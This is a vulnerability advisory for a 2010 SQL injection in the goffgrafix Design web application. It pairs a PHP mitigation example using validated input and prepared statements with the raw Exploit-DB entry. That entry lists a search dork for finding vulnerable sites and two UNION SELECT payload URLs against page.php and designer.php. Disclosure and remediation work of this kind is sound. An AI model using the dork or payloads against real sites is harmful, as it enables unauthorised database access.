Vendor: goffgrafix Design
By: Ashiyane Digital Security Team
CVSS: 9,3 HIGH
CWE: 89 (SQL Injection)
Product Name: goffgrafix Design
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: a:goffgrafix_design:goffgrafix_design
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

goffgrafix Design’s SQL Injection Vulnerability

goffgrafix Design is vulnerable to SQL injection attacks. Attackers can exploit this vulnerability to gain access to the underlying database and execute arbitrary SQL commands. The vulnerability exists due to insufficient input validation in the "id" parameter of the "page.php" and "designer.php" scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized.
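
One way to apply this mitigation to a numeric "id" parameter such as the one in "page.php" and "designer.php". This is an added example, not code from the vendor or from the advisory; the `pages` table, its columns, the function names and the in-memory SQLite database are assumptions chosen so the script runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database (assumption).
function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $pdo->exec("INSERT INTO pages (id, title, body) VALUES (1, 'Home', 'Welcome')");
    return $pdo;
}

// Accept only a plain positive decimal integer; anything else is rejected
// before it reaches the database layer.
function parse_page_id(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The id is bound as a typed parameter, so it is never parsed as SQL text.
function fetch_page(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_demo_db();
// Constructed inputs: a legitimate id, and the value shape from the advisory's
// demo line after URL decoding ('+' becomes a space).
$samples = ['1', '-999 UNION All SELECT 1,version(),3,4,5,6,7'];
foreach ($samples as $raw) {
    $id = parse_page_id($raw);
    if ($id === null) {
        echo "rejected: ", $raw, PHP_EOL; // a real handler would answer HTTP 400
        continue;
    }
    $page = fetch_page($pdo, $id);
    echo $page === null ? "not found: $id" : "found: {$page['title']}", PHP_EOL;
}
```

With the MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the statement is prepared on the server rather than assembled client-side.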

Exploit-DB raw data:

=========================================================
goffgrafix Design's SQL Injection Vulnerability
=========================================================
##########################################
# Name: goffgrafix Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.goffgrafix.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Web design by goffgrafix.com"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/media.php?id=-999+UNION+All+SELECT+1,version(),3,4,5,6,7

[+] Demo: http://server/designer.php?id=-999+UNION+all+SELECT+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

##########################################